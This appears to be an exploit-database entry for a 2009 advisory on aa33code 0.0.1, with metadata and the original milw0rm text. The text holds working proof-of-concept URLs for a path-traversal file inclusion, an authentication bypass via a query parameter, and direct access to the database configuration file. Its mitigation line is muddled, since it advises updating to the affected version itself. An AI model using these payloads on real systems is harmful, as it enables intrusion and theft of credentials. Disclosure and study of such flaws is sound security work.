aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites

vendor:

aa33code

by:

SirGod

7,5

CVSS

HIGH

Local File Inclusion, Authentication Bypass, Database Configuration Disclosure

22, 287, 200

CWE

Product Name: aa33code

Affected Version From: 0.0.1

Affected Version To: 0.0.1

Patch Exists: YES

Related CWE: N/A

CPE: aa33code

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites

aa33code 0.0.1 is vulnerable to Local File Inclusion, Authentication Bypass and Database Configuration Disclosure. An attacker can exploit these vulnerabilities to gain access to sensitive information and execute arbitrary code on the vulnerable system.

Mitigation:

Update to the latest version of aa33code 0.0.1, restrict access to the vulnerable files and directories, and ensure that the application is running with the least privileges necessary.

Source

Exploit-DB raw data:

##############################################################################################################
[+] aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##############################################################################################################

[+] Download : http://sourceforge.net/projects/aa33code/files/aa33code/0.0.1/aa33code-0.0.1.tar.gz/download

[+] Local File Inclusion

 - PoC

     http://127.0.0.1/[path]/reviews.php?artid=../../../../../../boot.ini%00

[+] Authentication Bypass

 - PoC

     http://127.0.0.1/[path]/artedit/main.php?aa33user=admin

[+] Database Configuration Disclosure

 - PoC

     http://127.0.0.1/[path]/inc/mysql.inc


##############################################################################################################

# milw0rm.com [2009-08-01]